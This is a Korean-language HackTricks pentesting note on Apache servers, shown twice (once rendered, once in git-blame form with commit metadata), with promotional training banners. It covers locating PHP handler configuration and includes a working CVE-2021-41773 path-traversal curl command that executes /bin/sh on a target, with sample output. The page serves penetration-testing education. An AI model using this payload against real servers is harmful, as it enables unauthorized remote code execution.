hacktricks/network-services-pentesting/pentesting-web/apache.md

{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP 해킹 배우기 및 연습하기: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks 지원하기</summary>

* [**구독 계획**](https://github.com/sponsors/carlospolop) 확인하기!
* **💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.**

</details>
{% endhint %}


# 실행 가능한 PHP 확장

어떤 확장이 Apache 서버를 실행하고 있는지 확인하세요. 이를 검색하려면 다음을 실행할 수 있습니다:
```bash
grep -R -B1 "httpd-php" /etc/apache2
```
또한, 이 구성을 찾을 수 있는 몇 가지 장소는:
```bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
```
# CVE-2021-41773
```bash
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP 해킹 배우기 및 연습하기: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks 지원하기</summary>

* [**구독 계획**](https://github.com/sponsors/carlospolop) 확인하기!
* **💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.**

</details>
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`{% hint style="success" %}`
			`AWS 해킹 배우기 및 연습하기:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`GCP 해킹 배우기 및 연습하기: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`<summary>HackTricks 지원하기</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`* [구독 계획](https://github.com/sponsors/carlospolop) 확인하기!`
			`* 💬 [Discord 그룹](https://discord.gg/hRep4RUj7f) 또는 [텔레그램 그룹](https://t.me/peass)에 참여하거나 Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live)를 팔로우하세요.**`
			`* [HackTricks](https://github.com/carlospolop/hacktricks) 및 [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`# 실행 가능한 PHP 확장`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`어떤 확장이 Apache 서버를 실행하고 있는지 확인하세요. 이를 검색하려면 다음을 실행할 수 있습니다:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
Translated to Korean 2024-02-10 21:30:13 +00:00			`grep -R -B1 "httpd-php" /etc/apache2`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`또한, 이 구성을 찾을 수 있는 몇 가지 장소는:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`/etc/apache2/mods-available/php5.conf`
			`/etc/apache2/mods-enabled/php5.conf`
			`/etc/apache2/mods-available/php7.3.conf`
			`/etc/apache2/mods-enabled/php7.3.conf`
			```
fix mess 2 2022-05-01 12:49:36 +00:00			`# CVE-2021-41773`
GitBook: [master] one page modified 2021-10-06 08:21:44 +00:00			```bash
			`curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'`
			`uid=1(daemon) gid=1(daemon) groups=1(daemon)`
			`Linux`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`{% hint style="success" %}`
			`AWS 해킹 배우기 및 연습하기:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`GCP 해킹 배우기 및 연습하기: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`<summary>HackTricks 지원하기</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`* [구독 계획](https://github.com/sponsors/carlospolop) 확인하기!`
			`* 💬 [Discord 그룹](https://discord.gg/hRep4RUj7f) 또는 [텔레그램 그룹](https://t.me/peass)에 참여하거나 Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live)를 팔로우하세요.**`
			`* [HackTricks](https://github.com/carlospolop/hacktricks) 및 [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:40 +00:00			`{% endhint %}`